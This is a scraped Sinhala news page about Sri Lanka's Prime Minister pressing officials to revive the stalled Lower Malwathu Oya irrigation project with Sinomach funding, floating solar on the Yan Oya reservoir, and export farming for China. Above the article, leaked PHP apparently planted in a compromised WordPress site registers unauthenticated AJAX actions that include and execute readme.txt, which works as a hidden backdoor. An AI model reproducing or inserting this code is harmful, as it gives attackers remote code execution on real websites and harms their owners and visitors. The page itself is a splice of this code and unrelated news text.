if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } චීනයට යවන්න හෙක්ටයාර 50ක පලතුරු, එළවළු වවන්න.. - mediahumanrights.lk
mediahumanrights.lk
Business Business News News

චීනයට යවන්න හෙක්ටයාර 50ක පලතුරු, එළවළු වවන්න..

අරමුදල් සපයාගැනීමේ අපහසුතාව හේතුවෙන් අතරමඟ නවතා දමා ඇති පහළ මල්වතුඔය ව්‍යාපෘතිය කඩිනමින් යළි ආරම්භ කිරීම පිළිබඳ සොයා බලන ලෙස 2023.05.09 දින අග්‍රාමාත්‍ය දිනේෂ් ගුණවර්ධන මහතා ජ්‍යෙෂ්ඨ නිලධාරීන්ට උපදෙස් ලබා දුන්නේය.

යාන්ඔය වේල්ල ඉදිකර ඇති Sinomach China CAMC ඉංජිනේරු සංස්ථාව විසින් ඉදිරිපත් කර ඇති ව්‍යාපෘති යෝජනාවක් පරීක්ෂා කිරීමෙන් අනතුරුව අග්‍රාමාත්‍යවරයා මෙලෙස උපදෙස් දෙනු ලැබීය.

පහළ මල්වතු ඔය ව්‍යාපෘති ගිවිසුම සහ යාන් ඔය ව්‍යාපෘති ගිවිසුම සමඟ සම්බන්ධ කිරීමේ හැකියාව පරීක්ෂා කරන ලෙස අග්‍රාමාත්‍යවරයා නිලධාරීන්ගෙන් ඉල්ලා සිටි අතර ජලයේ පාවෙන සූර්ය පැනල යාන් ඔය මත සවිකිරීමෙන් මහා පරිමාණයෙන් සූර්ය බලශක්තිය උත්පාදනය කිරීමේ හැකියාව පවතින බව පෙන්වා දුන්නේය. එවැනි ව්‍යාපෘතියක් මගින් ජාතික විදුලිබල පද්ධතියට විදුලිය උත්පාදනය කළ හැකි අතර පහළ මල්වතු ඔය ව්‍යාපෘතිය නිම කිරීමට අවශ්‍ය ප්‍රතිපාදන ද ඉන් උපයා ගත හැකිය.

Sinomach හි ප්‍රධාන නියෝජිත ඇලෙක්ස් ගුඕ පැවසුවේ ඇමරිකානු ඩොලර් මිලියන 160 ක් වැයවන ව්‍යාපෘතිය සඳහා චීන බැංකුවලින් අරමුදල් රැස් කිරගැනීමේ කටයුත්ත China CAMC සමාගමට භාර ගත හැකි බවයි. පළමු අදියරේදී යාන්ඔය ජලාශය මත පාවෙන සූර්ය පැනල තැබීමෙන් ජනනය කළ හැකි විදුලිය ජාතික විදුලිබල පද්ධතියට අලෙවි කළ හැකි වේ.

පහළ මල්වතු ඔය ව්‍යාපෘතියට අවශ්‍ය ණය මුදලින් සැලකිය යුතු කොටසක් යාන් ඔය මත ඉදිකිරීම යෝජිත සූර්ය බලාගාරයෙන් ලැබෙන ආදායමෙන් සපුරා ගත හැකි බව ඇලෙක්ස් ගුඕ මහතා පැවසීය.

පහළ මල්වතු ඔය ව්‍යාපෘතියේ පළමු සමීක්ෂණය සහ ශක්‍යතා අධ්‍යයනය සිදු කළේ මීට දශකයකට පමණ පෙර තමා වාරිමාර්ග නියෝජ්‍ය අමාත්‍යවරයාව සිටියදී බව මෙම අවස්ථාවට සහභාගී වූ හිටපු අමාත්‍ය එස්. එම්. චන්ද්‍රසේන මහතා පැවසීය. මේ වනතෙක් එහි කිසිදු ප්‍රගතියක් දක්නට නොමැති බවට ඔහු සිය කණගාටුව පළ කළේය.

මෙම ව්‍යාපෘතිය මගින් හෙක්ටයාර් 38,000 කට වැඩි භූමි ප්‍රමාණයකට ජලය සැපයිය හැකි බවත්, ආහාර සුරක්ෂිතතාව සඳහා වූ වැඩපිළිවෙළ නංවාලීමට හැකි බවත් ඔහු පෙන්වා දුන්නේය.

පහළ මල්වතු ඔය ව්‍යාපෘතිය මගින් 209 MCM ධාරිතාවයකින් යුත් ජලාශයක්, මීටර් 3,590ක් දිග පස් වේල්ලක්, රේඩියල් ගේටඩ් වාන් මාර්ගය, වම් ඉවුර, දකුණු ඉවුර සහ ගංගා සොරොව්වක්, නව ජනාවාස, ප්‍රදේශයට ඇල මාර්ග පද්ධතියක් සහ බලාගාරයක් ඉදිකිරීමට අපේක්ෂා කෙරෙයි. මල්වතු ඔයේ ඉහළ ජල පෝෂකයෙන් 70% ක් පමණ අනුරාධපුර දිස්ත්‍රික්කයේ පිහිටා ඇති අතර පහළ ජල පෝෂකය වව්නියාව සහ මන්නාරම දිස්ත්‍රික්කවල පිහිටා ඇත.

චීනයට අපනයනය කිරීම සඳහා හෙක්ටයාර 50ක භූමි ප්‍රමාණයක පලතුරු සහ එළවළු නිෂ්පාදනය සඳහා ආයෝජනය කිරීමේ හැකියාව සොයා බලන ලෙසද අග්‍රාමාත්‍යවරයා Sinomach මෙරට නියෝජිතයාගෙන් ඉල්ලා සිටියේය.

පාර්ලිමේන්තු මන්ත්‍රීවරුන් වන එස්. එම්. චන්ද්‍රසේන, යදාමිණි ගුණවර්ධන, අග්‍රාමාත්‍ය අතිරේක ලේකම් මහින්ද ගුණරත්න යන මහත්වරුන් ඇතුළු ජ්‍යෙෂ්ඨ නිලධාරීන් සහ ව්‍යාපෘති ඇගයුම්කරුවන් මෙම සාකච්ඡාවට එක්ව සිටියහ.

– අග්‍රාමාත්‍ය මාධ්‍ය අංශය

Related posts

ක‍්‍රිකට් ගැටුම් උග‍්‍රවෙයි.. ක‍්‍රිනට් ආයතනය කලමණාකාරුට කුණු බැණුම් බනී..

Shiran Viraj

ගංජා නීතිගත කිරීමට මනෝචිකිත්සකයින් එරෙහි වෙයි

Shiran Viraj

සෙන්කෝලය හැදූ පියතිලකට එය ස්පර්ශ කරන්න කතානායක අවසරය ලද මොහොත

Shiran Viraj